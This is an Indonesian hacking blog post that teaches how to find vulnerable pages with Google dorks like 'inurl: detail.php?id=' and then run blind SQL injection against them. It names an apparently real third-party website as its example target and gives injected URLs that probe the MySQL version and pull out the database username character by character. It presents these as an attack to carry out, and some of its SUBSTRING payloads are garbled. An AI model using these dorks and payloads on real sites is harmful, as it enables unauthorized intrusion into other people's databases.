Cara Menebak Dork / Kata Kunci

07.16

Selamat malam Sobat blogger ,kali ini mimin mau share apa sih itu dork dan gimana sih cara mengetahui vesi mysql nya yaudh langsung aja yaa guys kita baca bersama .....

example : “http://target site/detail.php?id=***”
Jadi Vuln filenya adalah : detail.php
Dork / Value's : (?)id=***

1. Setelah itu kita cari Di google dengan keyword :

inurl: detail.php?id=

2. Sebagai contoh saya mendapatkan hasil :

http://www.amandawade.ca/detail.php?id=207679

3. Buka new tab di browser anda, lalu attack site diatas :

sama seperti sql injection,kita cari dulu lobangnya..

4. Setelah itu kita cari versi sql nya :

http://www.amandawade.ca/detail.php?id=207679+and+substring(@@version,1,1)=5 << true
jadi target diatas, merupakan sql versi 5
nah gimana nebak next karakternya?
SQL blind atacknya pakai looping dari a-z trus dari 1-9

5. Exploiting True/False conditions

Select user returns ‘dbo’
SUBSTRING(‘Select user’, 1, 1) = ‘d’
SUBSTRING(‘Select user’, 2, 1) = ‘b’
SUBSTRING(‘Select user’, 3, 1) = ‘o’
http://www.amandawade.ca/detail.php?id=207679 and SUBSTRING(‘Select user’, 1, 1) = ‘d’ TRUE
http://www.amandawade.ca/detail.php?id=207679 and SUBSTRING(‘Select user’, 1, 1) = ‘X’ FALSE
Select user returns ‘dbo’
SUBSTRING(‘Select user’, 1, 1) = ‘d’
SUBSTRING(‘Select user’, 2, 1) = ‘b’
SUBSTRING(‘Select user’, 3, 1) = ‘o’
Jadi DB username nya : dbo

Minggu, 04 Juni 2017

Cara Menebak Dork / Kata Kunci

Add Your Comments